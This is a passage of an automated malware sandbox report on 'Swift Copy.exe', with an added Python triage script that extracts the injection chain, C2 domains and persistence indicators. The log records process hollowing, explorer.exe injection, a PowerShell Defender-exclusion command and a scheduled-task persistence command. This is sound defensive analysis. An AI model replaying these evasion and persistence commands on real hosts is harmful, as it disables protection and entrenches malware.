Source: C:\Users\user\Desktop\Swift Copy.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 10F1008
Source: C:\Users\user\Desktop\Swift Copy.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread register set: target process: 3968
Source: C:\Windows\SysWOW64\NETSTAT.EXE Thread register set: target process: 3968
Source: C:\Users\user\Desktop\Swift Copy.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe
Source: C:\Users\user\Desktop\Swift Copy.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ImUIYlbLTIh" /XML "C:\Users\user\AppData\Local\Temp\tmpE16E.tmp
Source: C:\Users\user\Desktop\Swift Copy.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: explorer.exe, 0000000B.00000000.380716731.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.334501812.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.287445550.0000000000688000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanEXE^
Source: explorer.exe, 0000000B.00000000.381862070.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.339209169.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.306173518.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000B.00000000.381862070.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.318298051.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.335155512.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000B.00000000.381862070.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.318298051.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.335155512.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000000B.00000000.381188687.0000000000708000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.317860532.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.287493311.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd4
Source: explorer.exe, 0000000B.00000000.381862070.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.318298051.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.335155512.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: WProgram Manager
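The long run of `mov eax, dword ptr fs:[00000030h]` reads in RegSvcs.exe and the HIPS / injection block above are easier to act on once reduced to a process chain and an IOC list. The Python below is an added triage example written for this page, not Joe Sandbox code; the line formats it parses are assumptions read off the report lines themselves, and its input is a constructed copy of a dozen of those lines. It counts PEB reads per function (fs:[30h] is the PEB pointer on 32-bit Windows, the base for the BeingDebugged and NtGlobalFlag checks behind the anti-analysis signatures), follows the write/map/APC edges from Swift Copy.exe through RegSvcs.exe and NETSTAT.EXE into explorer.exe, and pulls out the C2 domains, the Defender exclusion path and the scheduled task name.

```python
"""Added example (not Joe Sandbox code): reduce the report's behaviour lines to
a PEB-read summary, a process-injection chain and an IOC/persistence list.
Line formats are assumptions read off the report text itself."""
import re
from collections import defaultdict

# Constructed input: a few lines copied from the report above.
SAMPLE_REPORT = r"""
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01946DC9 mov ecx, dword ptr fs:[00000030h] 8_2_01946DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01946DC9 mov eax, dword ptr fs:[00000030h] 8_2_01946DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01978DF1 mov eax, dword ptr fs:[00000030h] 8_2_01978DF1
Source: C:\Windows\explorer.exe Network Connect: 103.92.235.55 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.mogdento.com
Source: C:\Windows\explorer.exe Domain query: www.kinemartigues.com
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 370000
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Swift Copy.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\Swift Copy.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe
Source: C:\Users\user\Desktop\Swift Copy.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ImUIYlbLTIh" /XML "C:\Users\user\AppData\Local\Temp\tmpE16E.tmp
Source: C:\Users\user\Desktop\Swift Copy.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"""

# Every behaviour line names the acting process first; paths may contain spaces.
_PROC = r"Source: (?P<src>.+?\.(?:exe|EXE)) "
_EXE = r"(?P<dst>.+?\.(?:exe|EXE))"
# fs:[30h] is the PEB pointer on 32-bit Windows; repeated reads usually mean
# BeingDebugged (PEB+2) / NtGlobalFlag (PEB+0x68) checks or loader-list walking.
PEB_RE = re.compile(_PROC + r"Code function: (?P<fn>\S+) mov \w+, dword ptr fs:\[00000030h\]")
DOMAIN_RE = re.compile(_PROC + r"Domain query: (?P<domain>\S+)")
CONNECT_RE = re.compile(_PROC + r"Network Connect: (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) (?P<port>\d+)")
INJECT_RE = re.compile(_PROC + r"(?P<action>Memory written|Section loaded: unknown target|"
                       r"Thread APC queued: target process|Section unmapped): " + _EXE)
CREATE_RE = re.compile(_PROC + r"Process created: " + _EXE + r" (?P<cmd>.*)$")
EXCLUSION_RE = re.compile(r'-ExclusionPath "?(?P<path>.+?)"?$')  # Add-MpPreference argument
TASK_RE = re.compile(r'/TN "?(?P<task>[^"]+)"')                  # schtasks task name


def _basename(path):
    return path.rsplit("\\", 1)[-1]


def _clean(line):
    """Drop the 'Jump to behavior' link text the HTML report appends to lines."""
    return re.sub(r"\s*Jump to behavior$", "", line.strip())


def triage(report_text):
    """Summarise evasion, injection, C2 and persistence lines into one dict."""
    peb = defaultdict(lambda: defaultdict(int))
    edges, domains, connects, exclusions, tasks = [], set(), set(), [], []
    for raw in report_text.splitlines():
        line = _clean(raw)
        if not line:
            continue
        if m := PEB_RE.match(line):
            peb[_basename(m["src"])][m["fn"]] += 1
        elif m := DOMAIN_RE.match(line):
            domains.add(m["domain"])
        elif m := CONNECT_RE.match(line):
            connects.add(f"{m['ip']}:{m['port']}")
        elif m := INJECT_RE.match(line):
            edges.append((_basename(m["src"]), _basename(m["dst"]), m["action"]))
        elif m := CREATE_RE.match(line):
            edges.append((_basename(m["src"]), _basename(m["dst"]), "Process created"))
            if e := EXCLUSION_RE.search(m["cmd"]):
                exclusions.append(e["path"])
            if t := TASK_RE.search(m["cmd"]):
                tasks.append(t["task"])
    return {
        "peb_reads": {p: dict(f) for p, f in peb.items()},
        "injection": sorted(set(edges)),
        "domains": sorted(domains),
        "connects": sorted(connects),
        "defender_exclusions": exclusions,
        "scheduled_tasks": tasks,
    }


def injection_chain(summary):
    """Follow write/map/APC edges from the root (a process that is never a target) to each leaf."""
    children = defaultdict(set)
    for src, dst, action in summary["injection"]:
        if action != "Process created":  # spawning a child is not injecting into it
            children[src].add(dst)
    roots = sorted(set(children) - {d for ds in children.values() for d in ds})
    paths = []

    def walk(node, path):
        if node not in children or node in path:  # leaf, or cycle guard
            paths.append(path + [node])
            return
        for nxt in sorted(children[node]):
            walk(nxt, path + [node])

    for root in roots:
        walk(root, [])
    return paths


if __name__ == "__main__":
    print(injection_chain(triage(SAMPLE_REPORT)))
```

Run against the sample it prints two routes into explorer.exe, Swift Copy.exe -> RegSvcs.exe -> NETSTAT.EXE -> explorer.exe and Swift Copy.exe -> RegSvcs.exe -> explorer.exe, which is the hollowing sequence the "Memory written ... value starts with: 4D5A", "Section loaded" and "Thread APC queued" lines describe. On a live host the two persistence artefacts it extracts can be confirmed with `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath` and `Get-ScheduledTask -TaskPath '\Updates\'`.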
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Users\user\Desktop\Swift Copy.exe VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
